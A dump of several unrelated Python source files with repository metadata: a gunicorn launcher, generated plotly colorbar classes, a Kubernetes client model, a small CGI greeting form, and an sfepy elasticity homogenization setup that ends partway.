3c75260b5e4ea95e62b5308d82fca71483ebc612 | 443d8ce2b7b706236eda935e0cd809c3ed9ddae3 | /virtual/bin/gunicorn | ca6b74ade67c3e02d6ea287a95095fbacd1cee42 | [
"MIT"
]
| permissive | billowbashir/MaNeighba | 269db52b506d4954e2907369340c97ce2c3a7a2f | 84ee7f86ac471c5449d94bd592adf004b3288823 | refs/heads/master | 2021-11-21T14:22:14.891877 | 2020-02-13T09:41:21 | 2020-02-13T09:41:21 | 153,802,533 | 0 | 0 | null | 2021-09-08T00:33:53 | 2018-10-19T15:15:16 | Python | UTF-8 | Python | false | false | 246 | #!/home/bashir/MaNeighba/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from gunicorn.app.wsgiapp import run
if __name__ == '__main__':
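    # Strip setuptools' '-script.py'/'.exe' wrapper suffix from argv[0] so the
    # program name gunicorn reports is clean.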
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run())
| [
"[email protected]"
]
| ||
f8332b51ff86f76385fbe4be9e2a971f78b0b4df | bb1e0e89fcf1f1ffb61214ddf262ba327dd10757 | /plotly_study/graph_objs/choropleth/colorbar/__init__.py | 260c248d1ed0c88a620f4f61647a5a35e410ceb2 | [
"MIT"
]
| permissive | lucasiscovici/plotly_py | ccb8c3ced89a0f7eccf1ae98551fa712460033fe | 42ab769febb45fbbe0a3c677dc4306a4f59cea36 | refs/heads/master | 2020-09-12T05:43:12.363609 | 2019-12-02T15:13:13 | 2019-12-02T15:13:13 | 222,328,180 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,104 | py | from plotly_study.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Title(_BaseTraceHierarchyType):
# font
# ----
@property
def font(self):
"""
Sets this color bar's title font. Note that the title's font
used to be set by the now deprecated `titlefont` attribute.
The 'font' property is an instance of Font
that may be specified as:
- An instance of plotly_study.graph_objs.choropleth.colorbar.title.Font
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include "Arial",
"Balto", "Courier New", "Droid Sans",, "Droid
Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
plotly_study.graph_objs.choropleth.colorbar.title.Font
"""
return self["font"]
@font.setter
def font(self, val):
self["font"] = val
# side
# ----
@property
def side(self):
"""
Determines the location of color bar's title with respect to
the color bar. Note that the title's location used to be set by
the now deprecated `titleside` attribute.
The 'side' property is an enumeration that may be specified as:
- One of the following enumeration values:
['right', 'top', 'bottom']
Returns
-------
Any
"""
return self["side"]
@side.setter
def side(self, val):
self["side"] = val
# text
# ----
@property
def text(self):
"""
Sets the title of the color bar. Note that before the existence
of `title.text`, the title's contents used to be defined as the
`title` attribute itself. This behavior has been deprecated.
The 'text' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["text"]
@text.setter
def text(self, val):
self["text"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "choropleth.colorbar"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
font
Sets this color bar's title font. Note that the title's
font used to be set by the now deprecated `titlefont`
attribute.
side
Determines the location of color bar's title with
respect to the color bar. Note that the title's
location used to be set by the now deprecated
`titleside` attribute.
text
Sets the title of the color bar. Note that before the
existence of `title.text`, the title's contents used to
be defined as the `title` attribute itself. This
behavior has been deprecated.
"""
def __init__(self, arg=None, font=None, side=None, text=None, **kwargs):
"""
Construct a new Title object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
plotly_study.graph_objs.choropleth.colorbar.Title
font
Sets this color bar's title font. Note that the title's
font used to be set by the now deprecated `titlefont`
attribute.
side
Determines the location of color bar's title with
respect to the color bar. Note that the title's
location used to be set by the now deprecated
`titleside` attribute.
text
Sets the title of the color bar. Note that before the
existence of `title.text`, the title's contents used to
be defined as the `title` attribute itself. This
behavior has been deprecated.
Returns
-------
Title
"""
super(Title, self).__init__("title")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly_study.graph_objs.choropleth.colorbar.Title
constructor must be a dict or
an instance of plotly_study.graph_objs.choropleth.colorbar.Title"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly_study.validators.choropleth.colorbar import title as v_title
# Initialize validators
# ---------------------
self._validators["font"] = v_title.FontValidator()
self._validators["side"] = v_title.SideValidator()
self._validators["text"] = v_title.TextValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("font", None)
self["font"] = font if font is not None else _v
_v = arg.pop("side", None)
self["side"] = side if side is not None else _v
_v = arg.pop("text", None)
self["text"] = text if text is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
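# Usage sketch (illustrative, not part of the generated module). Assumes the
# plotly_study fork keeps plotly's graph_objs behavior; the text/side/font
# values below are made-up examples.
#
#     from plotly_study.graph_objs.choropleth.colorbar import Title
#     t = Title(text="Unemployment (%)", side="right", font=dict(size=14))
#     t.to_plotly_json()
#     # {'text': 'Unemployment (%)', 'side': 'right', 'font': {'size': 14}}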
from plotly_study.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Tickformatstop(_BaseTraceHierarchyType):
# dtickrange
# ----------
@property
def dtickrange(self):
"""
Range [*min*, *max*], where "min" and "max" are dtick values
describing a zoom level; either "min" or "max" may be omitted
by passing "null".
The 'dtickrange' property is an info array that may be specified as:
* a list or tuple of 2 elements where:
(0) The 'dtickrange[0]' property accepts values of any type
(1) The 'dtickrange[1]' property accepts values of any type
Returns
-------
list
"""
return self["dtickrange"]
@dtickrange.setter
def dtickrange(self, val):
self["dtickrange"] = val
# enabled
# -------
@property
def enabled(self):
"""
Determines whether or not this stop is used. If `false`, this
stop is ignored even within its `dtickrange`.
The 'enabled' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["enabled"]
@enabled.setter
def enabled(self, val):
self["enabled"] = val
# name
# ----
@property
def name(self):
"""
When used in a template, named items are created in the output
figure in addition to any items the figure already has in this
array. You can modify these items in the output figure by
making your own item with `templateitemname` matching this
`name` alongside your modifications (including `visible: false`
or `enabled: false` to hide it). Has no effect outside of a
template.
The 'name' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["name"]
@name.setter
def name(self, val):
self["name"] = val
# templateitemname
# ----------------
@property
def templateitemname(self):
"""
Used to refer to a named item in this array in the template.
Named items from the template will be created even without a
matching item in the input figure, but you can modify one by
making an item with `templateitemname` matching its `name`,
alongside your modifications (including `visible: false` or
`enabled: false` to hide it). If there is no template or no
matching item, this item will be hidden unless you explicitly
show it with `visible: true`.
The 'templateitemname' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["templateitemname"]
@templateitemname.setter
def templateitemname(self, val):
self["templateitemname"] = val
# value
# -----
@property
def value(self):
"""
The dtickformat string to use for the described zoom level; it
uses the same syntax as "tickformat".
The 'value' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["value"]
@value.setter
def value(self, val):
self["value"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "choropleth.colorbar"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
dtickrange
Range [*min*, *max*], where "min" and "max" are dtick
values describing a zoom level; either "min" or "max" may
be omitted by passing "null".
enabled
Determines whether or not this stop is used. If
`false`, this stop is ignored even within its
`dtickrange`.
name
When used in a template, named items are created in the
output figure in addition to any items the figure
already has in this array. You can modify these items
in the output figure by making your own item with
`templateitemname` matching this `name` alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). Has no effect outside of a
template.
templateitemname
Used to refer to a named item in this array in the
template. Named items from the template will be created
even without a matching item in the input figure, but
you can modify one by making an item with
`templateitemname` matching its `name`, alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). If there is no template or no
matching item, this item will be hidden unless you
explicitly show it with `visible: true`.
value
The dtickformat string to use for the described zoom
level; it uses the same syntax as "tickformat".
"""
def __init__(
self,
arg=None,
dtickrange=None,
enabled=None,
name=None,
templateitemname=None,
value=None,
**kwargs
):
"""
Construct a new Tickformatstop object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
plotly_study.graph_objs.choropleth.colorbar.Tickformatstop
dtickrange
Range [*min*, *max*], where "min" and "max" are dtick
values describing a zoom level; either "min" or "max" may
be omitted by passing "null".
enabled
Determines whether or not this stop is used. If
`false`, this stop is ignored even within its
`dtickrange`.
name
When used in a template, named items are created in the
output figure in addition to any items the figure
already has in this array. You can modify these items
in the output figure by making your own item with
`templateitemname` matching this `name` alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). Has no effect outside of a
template.
templateitemname
Used to refer to a named item in this array in the
template. Named items from the template will be created
even without a matching item in the input figure, but
you can modify one by making an item with
`templateitemname` matching its `name`, alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). If there is no template or no
matching item, this item will be hidden unless you
explicitly show it with `visible: true`.
value
The dtickformat string to use for the described zoom
level; it uses the same syntax as "tickformat".
Returns
-------
Tickformatstop
"""
super(Tickformatstop, self).__init__("tickformatstops")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly_study.graph_objs.choropleth.colorbar.Tickformatstop
constructor must be a dict or
an instance of plotly_study.graph_objs.choropleth.colorbar.Tickformatstop"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly_study.validators.choropleth.colorbar import (
tickformatstop as v_tickformatstop,
)
# Initialize validators
# ---------------------
self._validators["dtickrange"] = v_tickformatstop.DtickrangeValidator()
self._validators["enabled"] = v_tickformatstop.EnabledValidator()
self._validators["name"] = v_tickformatstop.NameValidator()
self._validators[
"templateitemname"
] = v_tickformatstop.TemplateitemnameValidator()
self._validators["value"] = v_tickformatstop.ValueValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("dtickrange", None)
self["dtickrange"] = dtickrange if dtickrange is not None else _v
_v = arg.pop("enabled", None)
self["enabled"] = enabled if enabled is not None else _v
_v = arg.pop("name", None)
self["name"] = name if name is not None else _v
_v = arg.pop("templateitemname", None)
self["templateitemname"] = (
templateitemname if templateitemname is not None else _v
)
_v = arg.pop("value", None)
self["value"] = value if value is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
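# Usage sketch (illustrative): a stop that switches the tick format for a given
# zoom range. The dtick bound 86400000.0 (one day, in milliseconds) and the
# date format string are example values, not defaults.
#
#     from plotly_study.graph_objs.choropleth.colorbar import Tickformatstop
#     stop = Tickformatstop(dtickrange=[None, 86400000.0], value="%e %b %Y", enabled=True)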
from plotly_study.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Tickfont(_BaseTraceHierarchyType):
# color
# -----
@property
def color(self):
"""
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# family
# ------
@property
def family(self):
"""
HTML font family - the typeface that will be applied by the web
browser. The web browser will only be able to apply a font if
it is available on the system which it operates. Provide
multiple font families, separated by commas, to indicate the
preference in which to apply fonts if they aren't available on
the system. The plotly service (at https://plot.ly or on-
premise) generates images on a server, where only a select
number of fonts are installed and supported. These include
"Arial", "Balto", "Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old Standard TT", "Open
Sans", "Overpass", "PT Sans Narrow", "Raleway", "Times New
Roman".
The 'family' property is a string and must be specified as:
- A non-empty string
Returns
-------
str
"""
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
# size
# ----
@property
def size(self):
"""
The 'size' property is a number and may be specified as:
- An int or float in the interval [1, inf]
Returns
-------
int|float
"""
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "choropleth.colorbar"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
"""
def __init__(self, arg=None, color=None, family=None, size=None, **kwargs):
"""
Construct a new Tickfont object
Sets the color bar's tick label font
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
plotly_study.graph_objs.choropleth.colorbar.Tickfont
color
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
Tickfont
"""
super(Tickfont, self).__init__("tickfont")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly_study.graph_objs.choropleth.colorbar.Tickfont
constructor must be a dict or
an instance of plotly_study.graph_objs.choropleth.colorbar.Tickfont"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly_study.validators.choropleth.colorbar import tickfont as v_tickfont
# Initialize validators
# ---------------------
self._validators["color"] = v_tickfont.ColorValidator()
self._validators["family"] = v_tickfont.FamilyValidator()
self._validators["size"] = v_tickfont.SizeValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
self["color"] = color if color is not None else _v
_v = arg.pop("family", None)
self["family"] = family if family is not None else _v
_v = arg.pop("size", None)
self["size"] = size if size is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
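# Usage sketch (illustrative): tick-label font for the color bar. The family
# string lists fallback typefaces in preference order, as described above.
#
#     from plotly_study.graph_objs.choropleth.colorbar import Tickfont
#     tf = Tickfont(color="#444", family="Open Sans, Arial", size=12)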
__all__ = ["Tickfont", "Tickformatstop", "Tickformatstop", "Title", "title"]
from plotly_study.graph_objs.choropleth.colorbar import title
| [
"[email protected]"
]
| |
4e1af43587d5fdb2600cc976d39472607dc4bf30 | 32c56293475f49c6dd1b0f1334756b5ad8763da9 | /google-cloud-sdk/lib/third_party/kubernetes/client/models/v1beta2_replica_set_status.py | 0c2f63cef33a6595d25265d9415af4140bce5378 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"MIT"
]
| permissive | bopopescu/socialliteapp | b9041f17f8724ee86f2ecc6e2e45b8ff6a44b494 | 85bb264e273568b5a0408f733b403c56373e2508 | refs/heads/master | 2022-11-20T03:01:47.654498 | 2020-02-01T20:29:43 | 2020-02-01T20:29:43 | 282,403,750 | 0 | 0 | MIT | 2020-07-25T08:31:59 | 2020-07-25T08:31:59 | null | UTF-8 | Python | false | false | 8,428 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen
https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.14.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta2ReplicaSetStatus(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name and the value is attribute
type.
attribute_map (dict): The key is attribute name and the value is json key
in definition.
"""
swagger_types = {
'available_replicas': 'int',
'conditions': 'list[V1beta2ReplicaSetCondition]',
'fully_labeled_replicas': 'int',
'observed_generation': 'int',
'ready_replicas': 'int',
'replicas': 'int'
}
attribute_map = {
'available_replicas': 'availableReplicas',
'conditions': 'conditions',
'fully_labeled_replicas': 'fullyLabeledReplicas',
'observed_generation': 'observedGeneration',
'ready_replicas': 'readyReplicas',
'replicas': 'replicas'
}
def __init__(self,
available_replicas=None,
conditions=None,
fully_labeled_replicas=None,
observed_generation=None,
ready_replicas=None,
replicas=None):
"""
V1beta2ReplicaSetStatus - a model defined in Swagger
"""
self._available_replicas = None
self._conditions = None
self._fully_labeled_replicas = None
self._observed_generation = None
self._ready_replicas = None
self._replicas = None
self.discriminator = None
if available_replicas is not None:
self.available_replicas = available_replicas
if conditions is not None:
self.conditions = conditions
if fully_labeled_replicas is not None:
self.fully_labeled_replicas = fully_labeled_replicas
if observed_generation is not None:
self.observed_generation = observed_generation
if ready_replicas is not None:
self.ready_replicas = ready_replicas
self.replicas = replicas
@property
def available_replicas(self):
"""
Gets the available_replicas of this V1beta2ReplicaSetStatus.
The number of available replicas (ready for at least minReadySeconds)
for this replica set.
:return: The available_replicas of this V1beta2ReplicaSetStatus.
:rtype: int
"""
return self._available_replicas
@available_replicas.setter
def available_replicas(self, available_replicas):
"""
Sets the available_replicas of this V1beta2ReplicaSetStatus.
The number of available replicas (ready for at least minReadySeconds)
for this replica set.
:param available_replicas: The available_replicas of this
V1beta2ReplicaSetStatus.
:type: int
"""
self._available_replicas = available_replicas
@property
def conditions(self):
"""
Gets the conditions of this V1beta2ReplicaSetStatus.
Represents the latest available observations of a replica set's current
state.
:return: The conditions of this V1beta2ReplicaSetStatus.
:rtype: list[V1beta2ReplicaSetCondition]
"""
return self._conditions
@conditions.setter
def conditions(self, conditions):
"""
Sets the conditions of this V1beta2ReplicaSetStatus.
Represents the latest available observations of a replica set's current
state.
:param conditions: The conditions of this V1beta2ReplicaSetStatus.
:type: list[V1beta2ReplicaSetCondition]
"""
self._conditions = conditions
@property
def fully_labeled_replicas(self):
"""
Gets the fully_labeled_replicas of this V1beta2ReplicaSetStatus.
The number of pods that have labels matching the labels of the pod
template of the replicaset.
:return: The fully_labeled_replicas of this V1beta2ReplicaSetStatus.
:rtype: int
"""
return self._fully_labeled_replicas
@fully_labeled_replicas.setter
def fully_labeled_replicas(self, fully_labeled_replicas):
"""
Sets the fully_labeled_replicas of this V1beta2ReplicaSetStatus.
The number of pods that have labels matching the labels of the pod
template of the replicaset.
:param fully_labeled_replicas: The fully_labeled_replicas of this
V1beta2ReplicaSetStatus.
:type: int
"""
self._fully_labeled_replicas = fully_labeled_replicas
@property
def observed_generation(self):
"""
Gets the observed_generation of this V1beta2ReplicaSetStatus.
ObservedGeneration reflects the generation of the most recently observed
ReplicaSet.
:return: The observed_generation of this V1beta2ReplicaSetStatus.
:rtype: int
"""
return self._observed_generation
@observed_generation.setter
def observed_generation(self, observed_generation):
"""
Sets the observed_generation of this V1beta2ReplicaSetStatus.
ObservedGeneration reflects the generation of the most recently observed
ReplicaSet.
:param observed_generation: The observed_generation of this
V1beta2ReplicaSetStatus.
:type: int
"""
self._observed_generation = observed_generation
@property
def ready_replicas(self):
"""
Gets the ready_replicas of this V1beta2ReplicaSetStatus.
The number of ready replicas for this replica set.
:return: The ready_replicas of this V1beta2ReplicaSetStatus.
:rtype: int
"""
return self._ready_replicas
@ready_replicas.setter
def ready_replicas(self, ready_replicas):
"""
Sets the ready_replicas of this V1beta2ReplicaSetStatus.
The number of ready replicas for this replica set.
:param ready_replicas: The ready_replicas of this
V1beta2ReplicaSetStatus.
:type: int
"""
self._ready_replicas = ready_replicas
@property
def replicas(self):
"""
Gets the replicas of this V1beta2ReplicaSetStatus.
Replicas is the most recently observed number of replicas. More info:
https://kubernetes.io/docs/concepts/workloads/controllers/replicationcontroller/#what-is-a-replicationcontroller
:return: The replicas of this V1beta2ReplicaSetStatus.
:rtype: int
"""
return self._replicas
@replicas.setter
def replicas(self, replicas):
"""
Sets the replicas of this V1beta2ReplicaSetStatus.
Replicas is the most recently observed number of replicas. More info:
https://kubernetes.io/docs/concepts/workloads/controllers/replicationcontroller/#what-is-a-replicationcontroller
:param replicas: The replicas of this V1beta2ReplicaSetStatus.
:type: int
"""
if replicas is None:
raise ValueError('Invalid value for `replicas`, must not be `None`')
self._replicas = replicas
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(
map(lambda x: x.to_dict() if hasattr(x, 'to_dict') else x, value))
elif hasattr(value, 'to_dict'):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], 'to_dict') else item, value.items()))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta2ReplicaSetStatus):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
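# Usage sketch (illustrative, not part of the generated client): `replicas` is
# the only required field; unset fields stay None and appear as None in to_dict().
#
#     status = V1beta2ReplicaSetStatus(replicas=3, ready_replicas=3, available_replicas=3)
#     status.to_dict()["replicas"]  # -> 3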
| [
"[email protected]"
]
| |
e47dce9c9c5eed815ffa55ca6d0aed20f77b9a8f | 80b2700b6f9940ee672f42124b2cb8a81836426e | /cgi/cgi.cgi | 5d4924622945cb130546139be58763ec78e549d9 | [
"Apache-2.0"
]
| permissive | Vayne-Lover/Python | 6c1ac5c0d62ecdf9e3cf68d3e659d49907bb29d4 | 79cfe3d6971a7901d420ba5a7f52bf4c68f6a1c1 | refs/heads/master | 2020-04-12T08:46:13.128989 | 2017-04-21T06:36:40 | 2017-04-21T06:36:40 | 63,305,306 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 335 | cgi | #!/usr/local/bin/python
import cgi
# A CGI response must send a Content-Type header followed by a blank line.
print 'Content-Type: text/html\n'
form = cgi.FieldStorage()
name = form.getvalue('name', 'world')
print '''
<html>
<head>
<title>Page</title>
</head>
<body>
<h1>Hello,%s</h1>
<form action='cgi.cgi'>
Change name<input type='text' name='name' />
<input type='submit'/>
</form>
</body>
</html>
'''%name
| [
"[email protected]"
]
| |
6a73d876aea17be4a376a5907de6235230844d3e | 1a4353a45cafed804c77bc40e843b4ad463c2a0e | /examples/homogenization/linear_homogenization.py | 1682971d9827a59e1fc33d4bc53001c774b6fcc9 | [
"BSD-3-Clause"
]
| permissive | shrutig/sfepy | 9b509866d76db5af9df9f20467aa6e4b23600534 | 87523c5a295e5df1dbb4a522b600c1ed9ca47dc7 | refs/heads/master | 2021-01-15T09:28:55.804598 | 2014-01-24T14:28:28 | 2014-01-30T16:25:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,370 | py | # 04.08.2009
#!
#! Homogenization: Linear Elasticity
#! =================================
#$ \centerline{Example input file, \today}
#! Homogenization of heterogeneous linear elastic material
import sfepy.fem.periodic as per
from sfepy.mechanics.matcoefs import stiffness_from_youngpoisson
from sfepy.homogenization.utils import define_box_regions
import sfepy.homogenization.coefs_base as cb
from sfepy import data_dir
from sfepy.base.base import Struct
from sfepy.homogenization.recovery import compute_micro_u, compute_stress_strain_u, compute_mac_stress_part
def recovery_le( pb, corrs, macro ):
out = {}
dim = corrs['corrs_le']['u_00'].shape[1]
mic_u = - compute_micro_u( corrs['corrs_le'], macro['strain'], 'u', dim )
out['u_mic'] = Struct( name = 'output_data',
mode = 'vertex', data = mic_u,
var_name = 'u', dofs = None )
stress_Y, strain_Y = compute_stress_strain_u( pb, 'i', 'Y', 'mat.D', 'u', mic_u )
stress_Y += compute_mac_stress_part( pb, 'i', 'Y', 'mat.D', 'u', macro['strain'] )
strain = macro['strain'] + strain_Y
out['cauchy_strain'] = Struct( name = 'output_data',
mode = 'cell', data = strain,
dofs = None )
out['cauchy_stress'] = Struct( name = 'output_data',
mode = 'cell', data = stress_Y,
dofs = None )
return out
#! Mesh
#! ----
filename_mesh = data_dir + '/meshes/3d/matrix_fiber.mesh'
dim = 3
region_lbn = (0, 0, 0)
region_rtf = (1, 1, 1)
#! Regions
#! -------
#! Regions, edges, ...
regions = {
'Y' : 'all',
'Ym' : 'cells of group 1',
'Yc' : 'cells of group 2',
}
regions.update( define_box_regions( dim, region_lbn, region_rtf ) )
#! Materials
#! ---------
materials = {
'mat' : ({'D' : {'Ym': stiffness_from_youngpoisson(dim, 7.0e9, 0.4),
'Yc': stiffness_from_youngpoisson(dim, 70.0e9, 0.2)}},),
}
#! Fields
#! ------
#! Scalar field for corrector basis functions.
fields = {
'corrector' : ('real', dim, 'Y', 1),
}
#! Variables
#! ---------
#! Unknown and corresponding test variables. Parameter fields
#! used for evaluation of homogenized coefficients.
variables = {
'u' : ('unknown field', 'corrector', 0),
'v' : ('test field', 'corrector', 'u'),
'Pi' : ('parameter field', 'corrector', 'u'),
'Pi1' : ('parameter field', 'corrector', '(set-to-None)'),
'Pi2' : ('parameter field', 'corrector', '(set-to-None)'),
}
#! Functions
functions = {
'match_x_plane' : (per.match_x_plane,),
'match_y_plane' : (per.match_y_plane,),
'match_z_plane' : (per.match_z_plane,),
}
#! Boundary Conditions
#! -------------------
#! Fixed nodes.
ebcs = {
'fixed_u' : ('Corners', {'u.all' : 0.0}),
}
if dim == 3:
epbcs = {
'periodic_x' : (['Left', 'Right'], {'u.all' : 'u.all'}, 'match_x_plane'),
'periodic_y' : (['Near', 'Far'], {'u.all' : 'u.all'}, 'match_y_plane'),
'periodic_z' : (['Top', 'Bottom'], {'u.all' : 'u.all'}, 'match_z_plane'),
}
else:
epbcs = {
'periodic_x' : (['Left', 'Right'], {'u.all' : 'u.all'}, 'match_x_plane'),
'periodic_y' : (['Bottom', 'Top'], {'u.all' : 'u.all'}, 'match_y_plane'),
}
all_periodic = ['periodic_%s' % ii for ii in ['x', 'y', 'z'][:dim] ]
#! Integrals
#! ---------
#! Define the integral type Volume/Surface and quadrature rule.
integrals = {
'i' : 2,
}
#! Options
#! -------
#! Various problem-specific options.
options = {
'coefs' : 'coefs',
'requirements' : 'requirements',
'ls' : 'ls', # linear solver to use
'volume' : { 'variables' : ['u'],
'expression' : 'd_volume.i.Y( u )' },
'output_dir' : 'output',
'coefs_filename' : 'coefs_le',
'recovery_hook' : 'recovery_le',
}
#! Equations
#! ---------
#! Equations for corrector functions.
equation_corrs = {
'balance_of_forces' :
"""dw_lin_elastic.i.Y(mat.D, v, u ) =
- dw_lin_elastic.i.Y(mat.D, v, Pi )"""
}
#! Expressions for homogenized linear elastic coefficients.
expr_coefs = """dw_lin_elastic.i.Y(mat.D, Pi1, Pi2 )"""
#! Coefficients
#! ------------
#! Definition of homogenized acoustic coefficients.
